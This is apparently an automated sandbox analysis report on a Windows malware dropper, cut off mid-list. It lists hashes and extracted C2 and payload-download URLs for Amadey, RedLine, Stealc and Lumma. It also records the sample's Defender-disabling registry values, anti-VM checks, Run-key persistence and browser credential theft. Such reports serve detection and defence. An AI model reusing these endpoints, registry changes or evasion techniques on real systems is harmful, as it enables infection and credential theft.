Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
21/02/2025, 15:42
Static task
static1
Behavioral task
behavioral1
Sample
1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Resource
win10v2004-20250217-en
General
-
Target
1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
-
Size
2.0MB
-
MD5
7ee5c35927de167525e0937df8bb98aa
-
SHA1
62bd44fda0661ea2d029cd8799109bd877842fc5
-
SHA256
1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e
-
SHA512
4a314887d52835dcb3508e8cd7a095a0dc681aa6566755a3492e480d0b1c3393f8eac33cd33b68bd120fd08b8a7b0ddb9e24fd97d7c98f921113f242cdf50640
-
SSDEEP
49152:YEUxVJjkz3UWKRAiHeOepRqcTZYRvZwquhts24pIiv:1UXCzZXRqcdovZtoO2Vi
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://prideforgek.fun/api
https://pausedcritiaca.fun/api
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 2 IoCs
resource yara_rule behavioral2/memory/3672-848-0x0000000000890000-0x0000000000CD4000-memory.dmp family_povertystealer behavioral2/memory/6840-2046-0x0000000000D40000-0x0000000001184000-memory.dmp family_povertystealer -
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral2/memory/2536-116-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/2536-261-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/2536-354-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/2536-396-0x0000000000400000-0x0000000000850000-memory.dmp family_vidar_v7 behavioral2/memory/4764-842-0x0000000000400000-0x000000000084B000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2108-255-0x00000000004D0000-0x000000000092C000-memory.dmp healer behavioral2/memory/2108-254-0x00000000004D0000-0x000000000092C000-memory.dmp healer behavioral2/memory/2108-353-0x00000000004D0000-0x000000000092C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/4632-450-0x0000000000C60000-0x00000000010D8000-memory.dmp family_sectoprat behavioral2/memory/4632-451-0x0000000000C60000-0x00000000010D8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7nSTXG6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ da74b104e1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4604003cca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 19ec845a59.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9e8de64c90.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d796f4a3f4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 14349890e7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aba393c809.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 257062250c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7f488eac68.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5371839e91.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f93ba905bf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 113 2708 powershell.exe 130 1692 powershell.exe 335 2292 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2708 powershell.exe 1692 powershell.exe 2292 powershell.exe 4696 powershell.exe 2660 powershell.exe 2604 powershell.exe -
Downloads MZ/PE file 30 IoCs
flow pid Process 186 4524 BitLockerToGo.exe 201 3636 BitLockerToGo.exe 367 2572 14349890e7.exe 367 2572 14349890e7.exe 367 2572 14349890e7.exe 367 2572 14349890e7.exe 367 2572 14349890e7.exe 367 2572 14349890e7.exe 113 2708 powershell.exe 130 1692 powershell.exe 335 2292 powershell.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 16 4708 skotes.exe 89 4708 skotes.exe 89 4708 skotes.exe 89 4708 skotes.exe 89 4708 skotes.exe -
Uses browser remote debugging 2 TTPs 19 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 976 chrome.exe 5784 msedge.exe 5244 msedge.exe 212 chrome.exe 2020 chrome.exe 4840 msedge.exe 1396 msedge.exe 3640 msedge.exe 1912 chrome.exe 3644 chrome.exe 5160 msedge.exe 4860 chrome.exe 5152 msedge.exe 3232 chrome.exe 876 chrome.exe 1596 msedge.exe 1440 chrome.exe 5772 msedge.exe 3540 msedge.exe -
Checks BIOS information in registry 2 TTPs 46 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d796f4a3f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 19ec845a59.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5371839e91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 14349890e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9e8de64c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion da74b104e1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9e8de64c90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d796f4a3f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f93ba905bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f93ba905bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion da74b104e1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aba393c809.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 257062250c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 257062250c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4604003cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7f488eac68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4604003cca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 14349890e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7f488eac68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 19ec845a59.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5371839e91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aba393c809.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 7nSTXG6.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 29 IoCs
pid Process 4708 skotes.exe 5004 lwtLxxH.exe 2536 7nSTXG6.exe 740 ebp51gY.exe 4548 skotes.exe 3392 1592ba5686.exe 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 3832 f93ba905bf.exe 2788 483d2fa8a0d53818306efeb32d3.exe 4548 0d668332f1.exe 4384 5e1ba7a6df.exe 232 9e8de64c90.exe 3192 d796f4a3f4.exe 4632 4604003cca.exe 2616 7f488eac68.exe 4024 19ec845a59.exe 4764 5371839e91.exe 3672 ftS1RPn.exe 440 da74b104e1.exe 2572 14349890e7.exe 4968 skotes.exe 828 2f701a17dc.exe 932 26d7898bf1.exe 5188 TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE 6600 aba393c809.exe 6840 ftS1RPn.exe 7148 DTQCxXZ.exe 6124 ebp51gY.exe 6460 257062250c.exe -
Identifies Wine through registry keys 2 TTPs 23 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 4604003cca.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 7f488eac68.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 14349890e7.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine aba393c809.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine f93ba905bf.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 257062250c.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 7nSTXG6.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 9e8de64c90.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d796f4a3f4.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 19ec845a59.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 5371839e91.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine da74b104e1.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ebp51gY.exe -
Loads dropped DLL 2 IoCs
pid Process 2572 14349890e7.exe 2572 14349890e7.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1592ba5686.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090449101\\1592ba5686.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090450021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\da74b104e1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090509001\\da74b104e1.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\14349890e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090510001\\14349890e7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2f701a17dc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090511001\\2f701a17dc.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d7898bf1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090512001\\26d7898bf1.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ipinfo.io -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023be1-148.dat autoit_exe behavioral2/files/0x0009000000023d8e-968.dat autoit_exe behavioral2/files/0x0008000000023da0-994.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 4708 skotes.exe 2536 7nSTXG6.exe 740 ebp51gY.exe 4548 skotes.exe 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 3832 f93ba905bf.exe 2788 483d2fa8a0d53818306efeb32d3.exe 232 9e8de64c90.exe 3192 d796f4a3f4.exe 4632 4604003cca.exe 2616 7f488eac68.exe 4024 19ec845a59.exe 4764 5371839e91.exe 3672 ftS1RPn.exe 440 da74b104e1.exe 2572 14349890e7.exe 4968 skotes.exe 5188 TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE 6600 aba393c809.exe 6840 ftS1RPn.exe 6124 ebp51gY.exe 6460 257062250c.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3192 set thread context of 4524 3192 d796f4a3f4.exe 167 PID 2616 set thread context of 3636 2616 7f488eac68.exe 173 PID 4548 set thread context of 2028 4548 0d668332f1.exe 174 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3760 4024 WerFault.exe 168 5328 2572 WerFault.exe 176 -
System Location Discovery: System Language Discovery 1 TTPs 59 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1592ba5686.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d796f4a3f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f701a17dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f93ba905bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e1ba7a6df.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5371839e91.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aba393c809.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 14349890e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4604003cca.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 2f701a17dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19ec845a59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language da74b104e1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 26d7898bf1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJEUZKQWRGZPGNYYG8AYFDLWCNYWBYVZS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 